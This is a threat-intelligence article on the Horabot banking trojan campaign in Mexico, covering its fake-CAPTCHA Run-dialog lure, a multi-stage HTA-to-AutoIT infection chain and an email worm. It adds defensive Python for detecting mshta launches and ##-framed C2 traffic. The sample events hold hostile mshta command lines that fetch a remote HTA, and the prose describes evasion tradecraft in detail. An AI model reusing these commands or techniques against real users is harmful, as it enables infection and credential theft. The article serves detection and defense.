Horabot Banking Trojan Resurfaces in Mexico with Sophisticated Phishing and Email Worm Tactics
A notorious banking trojan known as Horabot has reemerged in Mexico, deploying a complex multi-stage infection process coupled with an email worm that transforms each compromised system into a phishing relay. This campaign integrates a Delphi-based banking trojan with a PowerShell-driven spreader, marking it as one of the more intricate financially motivated threats in Latin America.
Initial Attack Vector:
The attack begins with a fake CAPTCHA page that instructs the visitor to open the Windows Run dialog and paste a command that launches `mshta` against an attacker-hosted HTA file. No software vulnerability is exploited: the chain relies entirely on social engineering, and because the victim types the command themselves, the launch looks like ordinary user activity and sidesteps many endpoint controls that key on exploit behavior.
Discovery and Analysis:
Security researchers identified this campaign after detecting a suspicious `mshta` execution alert within a monitored environment. Further investigation traced the activity back to the fraudulent CAPTCHA page, allowing analysts to map the complete attack chain by examining the adversary’s infrastructure.
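The alert that started the investigation is a natural place to write a detection. The following is an added example, not code from the original article or from the researchers: it runs a small rule over constructed process-creation records in a Sysmon-like shape (the field names Image, ParentImage and CommandLine are an assumption about the reader's logging) and flags `mshta.exe` started by the interactive shell with a remote target, which is exactly what the Run-dialog CAPTCHA lure produces.

```python
"""Flag mshta.exe launches that fit the Run-dialog CAPTCHA lure.

Added example: the events below are constructed, not real telemetry, and the
field names (Image, ParentImage, CommandLine) follow the Sysmon process-creation
shape as an assumption about the reader's logging.
"""
import re
from pathlib import PureWindowsPath

# Constructed process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {  # the lure: Run dialog (hosted by explorer.exe) -> mshta <remote HTA>
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "mshta https://captcha.example.invalid/verify",
    },
    {  # benign: an installer opening its own local HTA
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Program Files\Vendor\setup.exe",
        "CommandLine": r'mshta.exe "C:\Program Files\Vendor\ui.hta"',
    },
    {  # unrelated: the shell launching an ordinary program
        "Image": r"C:\Windows\System32\notepad.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "notepad.exe",
    },
    {  # the lure again, with a UNC path instead of a URL
        "Image": r"C:\Windows\SysWOW64\mshta.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"mshta \\203.0.113.5\share\x.hta",
    },
]

# A URL scheme or a UNC path: the HTA is being fetched from somewhere else.
REMOTE_REF = re.compile(r"(?i)(?:https?|ftp)://\S+|\\\\[\w.\-]+\\\S+")

# Processes that host the Run dialog; a user-typed command inherits this parent.
INTERACTIVE_SHELLS = {"explorer.exe"}


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def mshta_remote_from_shell(event: dict) -> bool:
    """True when mshta.exe, spawned by the interactive shell, is given a remote target."""
    if _basename(event["Image"]) != "mshta.exe":
        return False
    if _basename(event["ParentImage"]) not in INTERACTIVE_SHELLS:
        return False
    return REMOTE_REF.search(event["CommandLine"]) is not None


def triage(events: list[dict]) -> list[str]:
    """Return the command lines of events that match the rule, in input order."""
    return [e["CommandLine"] for e in events if mshta_remote_from_shell(e)]


if __name__ == "__main__":
    for cmd in triage(SAMPLE_EVENTS):
        print("ALERT mshta from Run dialog with remote target:", cmd)
```

A command typed into the Run dialog runs with explorer.exe as its parent, which is why the rule keys on that parent; an installer opening a local HTA from its own process does not match. To corroborate a hit on the host, read the RunMRU key under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which records what was typed into the Run dialog.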
During this process, researchers uncovered an exposed victim log on the attacker’s server, revealing 5,384 infected machines—5,030 of which, approximately 93%, were located in Mexico. Records dating back to May 2025 indicate that the operation had been active for several months prior to detection.
Indicators of Brazilian Origin:
Evidence suggests that the threat actors have ties to Brazil. Comments within the spreader's PowerShell code are written in casual Brazilian Portuguese, and the key used to decrypt embedded resources references the phrase "pega a visão", Brazilian slang for "get the picture". The phishing emails the worm sends are written in Spanish and styled as fake invoices or confidential business documents aimed at Mexican recipients.
Functionality of the Banking Trojan:
The Delphi-based banking trojan, also tracked as Casbaneiro, Ponteiro, and Metamorfo, displays fake bank overlay pop-ups to steal login credentials while the victim is in an active banking session. The email worm component harvests contact addresses from the victim's mailbox through the MAPI namespace and sends each contact a phishing email carrying a malicious PDF, so every infected host becomes a new distribution point for the same chain.
Multi-Stage Infection Mechanism:
This campaign is distinguished by its elaborate delivery method, with each stage adding a new layer of obfuscation before deploying the final malware.
1. Execution of Malicious HTA File: The process begins when the victim executes the HTA file, which then retrieves a JavaScript loader from an attacker-controlled domain.
2. JavaScript Loader: This loader fetches and runs an obfuscated VBScript.
3. Obfuscated VBScript: The server that delivers this script applies server-side polymorphism, returning slightly different code on each request so that file hashes and static signatures do not match from one victim to the next.
4. Comprehensive VBScript: A second, more complex VBScript collects system information, including IP address, hostname, username, and OS version, and transmits this data to a command-and-control (C2) server. It also drops AutoIT components to disk, creates a LNK shortcut in the Startup folder for persistence, and downloads the next stage.
5. AutoIT Script: This script decrypts an AES-192-encrypted blob with a key derived from the seed value `99521487` and loads the resulting DLL, the banking trojan itself, directly into memory rather than writing it to disk.
6. Communication with C2 Server: The trojan talks to its C2 server over a custom TCP protocol, with all traffic encrypted by a stateful XOR cipher. Each encrypted message is wrapped between `##` markers that are sent in the clear; the pattern is uncommon in legitimate traffic and gives defenders a network detection signature that survives the encryption.
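The framing is what makes this traffic detectable: a stateful XOR keystream changes as the message progresses, so the encrypted body never repeats across messages, but the `##` delimiters are plain bytes. The block below is an added example, not the researchers' code and not Horabot's protocol. It extracts `##`-framed messages from a captured TCP payload and, so that the sample stream can be built offline, uses a toy stateful XOR (each key byte is replaced by the previous ciphertext byte) that illustrates the concept only and is not the cipher Horabot uses; the plaintext, key byte and benign HTTP request are constructed.

```python
"""Pull ##-framed messages out of a TCP payload.

Added example. The cipher below is a toy stand-in for "stateful XOR" (the key
byte is replaced by the previous ciphertext byte), chosen only so that the
sample stream can be built offline; it is not Horabot's cipher. The plaintext,
the key and the benign HTTP request are constructed.
"""
import math
import re

# Non-greedy so the body ends at the first closing pair after the opener.
FRAME = re.compile(rb"##(.*?)##", re.DOTALL)


def toy_stateful_xor_encrypt(plaintext: bytes, key: int) -> bytes:
    """XOR each byte with the running key, then make the ciphertext byte the new key."""
    out = bytearray()
    for b in plaintext:
        c = b ^ key
        out.append(c)
        key = c
    return bytes(out)


def toy_stateful_xor_decrypt(ciphertext: bytes, key: int) -> bytes:
    """Inverse of the toy cipher: the previous ciphertext byte is always known to the receiver."""
    out = bytearray()
    for c in ciphertext:
        out.append(c ^ key)
        key = c
    return bytes(out)


def extract_frames(stream: bytes) -> list[bytes]:
    """Return the bodies of every ##...## frame in the stream, in order."""
    return [m.group(1) for m in FRAME.finditer(stream)]


def entropy_bits(data: bytes) -> float:
    """Shannon entropy per byte; an encrypted body scores higher than plain text of the same size."""
    if not data:
        return 0.0
    counts: dict[int, int] = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


# Constructed inputs (not captured traffic).
KEY = 0x5A
PLAINTEXT = b"HOST=WKS01;USER=ana"
BENIGN_HTTP = b"GET /index.html HTTP/1.1\r\nHost: example.invalid\r\n\r\n"
C2_MESSAGE = b"##" + toy_stateful_xor_encrypt(PLAINTEXT, KEY) + b"##"
SAMPLE_STREAM = BENIGN_HTTP + C2_MESSAGE


def report(stream: bytes) -> list[tuple[int, int, float]]:
    """(offset, body length, body entropy) for each frame found; an empty list means no hit."""
    return [(m.start(), len(m.group(1)), entropy_bits(m.group(1)))
            for m in FRAME.finditer(stream)]


if __name__ == "__main__":
    for off, length, ent in report(SAMPLE_STREAM):
        print(f"##-framed message at offset {off}: {length} bytes, entropy {ent:.2f} bits/byte")
```

Two caveats for turning this into a production rule. The non-greedy match ends at the first `##` after the opener, so a ciphertext byte pair that happens to equal `##` would split a frame; count marker pairs per connection, or require the body to be non-text, rather than trusting the regex alone. The entropy value is there to separate an encrypted body from an innocent `##` that appears in ordinary content (a Markdown heading inside an HTTP response, for instance), which the marker pattern by itself cannot do.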
Implications and Recommendations:
The resurgence of Horabot underscores the evolving sophistication of cyber threats targeting financial institutions and their customers in Latin America. The combination of social engineering tactics, multi-stage infection chains, and email worm capabilities highlights the need for heightened vigilance and robust cybersecurity measures.
To mitigate the risk of such infections, users and organizations are advised to:
– Exercise Caution with Email Attachments and Links: Avoid opening attachments or clicking on links from unknown or untrusted sources.
– Verify Authenticity of Web Pages: Treat any page that asks you to open the Run dialog, paste a command, or download a file in order to pass a "verification" step as hostile; a legitimate CAPTCHA never requires this.
– Implement Advanced Threat Detection Solutions: Deploy tooling that can follow multi-stage, obfuscated chains rather than matching a single file, and restrict or alert on script hosts such as `mshta`, which this campaign depends on for its very first step.
– Educate Users on Social Engineering Tactics: Conduct regular training sessions to raise awareness about common phishing techniques and how to recognize them.
– Maintain Up-to-Date Systems and Software: Ensure that all systems and software are regularly updated to patch known vulnerabilities.
By adopting these practices, individuals and organizations can enhance their defenses against sophisticated threats like the Horabot banking trojan.